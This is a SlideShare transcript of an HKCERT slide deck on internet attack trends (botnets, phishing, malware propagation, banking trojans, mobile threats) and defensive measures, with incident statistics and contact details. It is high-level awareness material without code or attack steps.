Your SlideShare is downloading. ×
3  Hkcert Trend
3  Hkcert Trend
3  Hkcert Trend
3  Hkcert Trend
3  Hkcert Trend
3  Hkcert Trend
3  Hkcert Trend
3  Hkcert Trend
3  Hkcert Trend
3  Hkcert Trend
3  Hkcert Trend
3  Hkcert Trend
3  Hkcert Trend
3  Hkcert Trend
3  Hkcert Trend
3  Hkcert Trend
3  Hkcert Trend
3  Hkcert Trend
3  Hkcert Trend
3  Hkcert Trend
3  Hkcert Trend
3  Hkcert Trend
3  Hkcert Trend
3  Hkcert Trend
3  Hkcert Trend
3  Hkcert Trend
3  Hkcert Trend
3  Hkcert Trend
3  Hkcert Trend
3  Hkcert Trend
3  Hkcert Trend
3  Hkcert Trend
3  Hkcert Trend
3  Hkcert Trend
3  Hkcert Trend
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×
Saving this for later? Get the SlideShare app to save on your phone or tablet. Read anywhere, anytime – even offline.
Text the download link to your phone
Standard text messaging rates apply

3 Hkcert Trend

1,139

Published on

Published in: Technology
0 Comments
1 Like
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
1,139
On Slideshare
0
From Embeds
0
Number of Embeds
0
Actions
Shares
0
Downloads
20
Comments
0
Likes
1
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide

Transcript

  • 1. Internet Attack Trend and Defense SC Leung Senior Consultant
  • 2. Agenda
    • Trend of the information security threat
    • How we become victims …
    • Most economical way to mitigate risks
  • 3. Security Threat Landscape
  • 4. Attacks targeting at Our Vulnerabilities
    • Insecure Configuration defaults: AutoRuns in USB, CDROM …
    • All software have security holes
      • Opportunity Window between discovery of security hole and availability of Patch
    • People can be cheated
      • “ Social Engineering” techniques
      • How can you gain trust from others == How can hacker gain trust from you
    System and Applications Human
  • 5. New Phishing Tactic Targets Tabs
    • http:// www.azarask.in /blog/post/a-new-type-of-phishing-attack/   (Proof of concept included)
    • http://krebsonsecurity.com/2010/05/devious-new-phishing-tactic-targets-tabs/
  • 6. Botnet ( ro Bot Net work ) ‏ is the major threat Bot Herder C&C Command & Control Centre Bots attacks Your computers! victim victim bot bot bot
  • 7. Maturity of the Underground Economy
    • Sell products (credentials malware and tools)
    • Hosting - spam or phishing hosting
    • CaaS (cybercrime as a service) - hired gun
    Commercialization Professionalization
    • Manageability of Infrastructure  Botnets
    • Specialization, Outsourcing, and Globalization of HR
    • Chained exploits
    Risk Management
    • Invisibility
    • Security
        • authentication, encryption
    • Survivability
        • e.g. Conficker
    sophistication
  • 8. Malware 2.0 Evade Detection Command & Control
    • Propagation
    • Forming a Botnet
    • Manage
    • Update
    • Survive the adverse
    Malware today causes victim PC becoming part of botnet
  • 9. Malware 2.0
    • Encryption or obfuscation
    • Morphing
    • Uses Search Engine to evade detection
        • Malware URL visible only when referred by search engine
        • Done by configuring “.htaccess” file of web server
    Sample content of “.htaccess” file under hacker’s control
  • 10. Malware Propagation channels Executables Document Malware Website
  • 11. Malware Propagation channels
    • Fake security software
    • Fake video player codec
    Executables Document Malware Website
  • 12. Malware Propagation channels Executables Document Malware
    • Embedded malware in PDF or Office files
    • Zeus botnet served PDF malware (Apr-2010)
    Website Image by Websense
  • 13. Malware Propagation channels Executables Document Malware Website
    • Legitimate and trusted websites compromised
    • Used to redirect user to malicious websites (via injected invisible iframes)
    • Most significant
    • Web admin incapable to detect and mitigate the risks
  • 14. Malware Propagation via websites
    • Mass infection of Wordpress blogs hosted by Network Solutions (Apr 2010)
      • Use insecure web application configuration
  • 15. PHPNuke.org web site hacked in May 2010
    • PHPNuke.org web site hacked (7 May 2010)
      • Serving several exploits
  • 16. Malware Propagation Channels
    • Hackers exploit Social Network Services to convince victims
    • Hacker uses Search Engine Optimization techniques to escalate malicious website ranking in search results
    Executables Document Malware Website Social Engineering & Black Hat SEO
  • 17. Targeted Attacks
    • Targeted, crafted email to corporations and government
    Executables Document Malware Website Social Engineering & Black Hat SEO Targeted Attacks
  • 18. Attacks Following Money
    • Targeting traditional online banking, online game
    • Obtaining credential for later use or for sale
    • via keyloggers
    Phishing Banking Trojans
    • Targeting new online banking services, esp. two factor authentication
    • Performing transaction on the spot
    • via advanced banking trojans, using involved man-in-the browser techniques
  • 19. Data Leakage
    • Insecure default settings
    • Malware embedded in P2P software
      • e.g. Foxy software
    P2P File Sharing Social Networking Services
    • Insecure default privacy settings
    • Leak out of personal information by friends
    • Lack of control 3 rd party apps on SNS
    • Malware on SNS
  • 20. Social network Id Theft Data Leakage Social Engineering
  • 21. Client Side attacks via Social Network Sites
    • Surge in Facebook Malware
    • TRUST:
      • Use social engineering trick, spoofing user’s friend and sending a message with an URL pertaining to be a movie
      • URL brings user to a fake YouTube site
  • 22. Client Side attacks via Social Network Sites
    • Suggesting to install a codec in order to view the movie
    Install the codec to view the movie
  • 23. Submitting the malware to VirusTotal.com Only small portion of scanners can identify the malware
  • 24.
    • Malicious servers redirect victims to the Exploit Server which serves as a central delivery
    Redirection of attacks to central exploit server Source: http://www.honeynet.org/papers/mws/KYE-Malicious_Web_Servers.htm
  • 25. Mobile Computing
    • Attacks exist for different mobile platforms
    • 2009-11 Attack jailbreak iPhones’s SSH backdoor
    • MobileSpy logs GPS location, call logs, sms log. Versions available for Android, Blackberry, iPhone, Windows Mobile, Symbian
    • Store personal & sensitive data
    • Some banks (UK Lloyd TSB) start to use as the client tool
    • NextGen data/voice integration
    • Insecure habits
      • Short URLs is common
      • Click links in email is common
      • Saved passwords is common
    • Security protection less mature than in PC
  • 26. Targeted Attack continues
    • Chained exploit
    • Advanced Persist Threats
      • Governments, critical infrastructure, private companies
  • 27. Consequence of Attack
  • 28. Consequences of Security Exposure
    • Machines fall into control by Hackers
    • Theft of Credentials  financial loss
    • Hacker launch local attacks to the whole network
    • Bandwidth and Performance downgrade
    • Legal liability  liable for hacking activities within your premise
  • 29. Mitigation Strategies Revisited
  • 30. What do we do?
      • Good example of Conficker Working Group
    • collecting information of hacker behaviour
    International Collaboration Cyber Drill Exercise Proactive Discovery of Incidents Intelligence and Research
      • finding compromised web site and malware hosting
  • 31. Awareness Education and Training
    • Awareness
      • Social Engineering
      • Emerging attacks like SNS, mobile
    • Social Engineering Drill Exercise
    • Publish Guidelines
    • Training of staff
    • Local cyber response drills
      • Cyber Response Drill – some teams do hold it annually
    • Form ISAC (Information Sharing and Advisory Centre)
    Public ISPs
  • 32. Proactivity in Incident Handling in HKCERT
    • Incident Reports Statistics (Apr-3 to Sep-30 2009)
    • Traditional report vs Proactive Discovery (search incidents that are not reported)
      • Traditional report: 493 (60%); Proactive Discovery: 330 (40%)
    • Among Traditional reports (493 cases)
      • Direct Phone in: 244 (49.5%), Referral: 170 (34.5%), Direct Email: 79 (16%),
      • Report by Local parties: 329 (67%), Report by Overseas parties: 164 (33%)
    • Conclusion:
      • Proactive Discovery is becoming a key source of incident reports
      • Overseas and referral reports has a significant portion.
      • We are aware more resources are required for handling external communication, development of automated searching capability
  • 33. What can you do – infrastructure?
    • Install Antivirus
    • Install Personal Firewall
    • Close all security holes
      • Patch systems
    • Set Strong Password
    • Close Insecure default settings: Autorun, …
    • Install Antivirus
    • Install Firewall. Block all incoming traffic except known services
    • Separate SAMS, ITED and public servers in zones
    • Set up Security Policy
      • Ban unauthorized servers in your network
    Personal Company
  • 34. HKCERT Guidelines
    • "Autorun virus" Removal Procedure
    • SQL Injection Defense Guideline
    • Data Protection Guideline
    • Guideline for Safety Using Wireless LA
    • SME Information Security Guideline
    • Guideline for Prevention of Spyware and other Potentially Unwanted Software 
    • http:// www.hkcert.org/english/sguide_faq/home.html
  • 35. Point of Contact
    • Phone : +852 8105 6060
    • Fax : +852 8105 9760
    • Email : hkcert @ hkcert.org
    • URL : http://www.hkcert.org/

×